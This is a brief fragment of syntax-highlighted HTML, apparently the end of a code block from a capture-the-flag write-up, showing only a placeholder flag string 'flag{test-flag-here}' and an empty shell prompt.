</span><span class="n">flag</span><span class="p">{</span><span class="n">test</span><span class="o">-</span><span class="n">flag</span><span class="o">-</span><span class="n">here</span><span class="p">}</span><span class="w">
</span><span class="o">$</span><span class="w">  
</span></code></pre></div></div>

:ET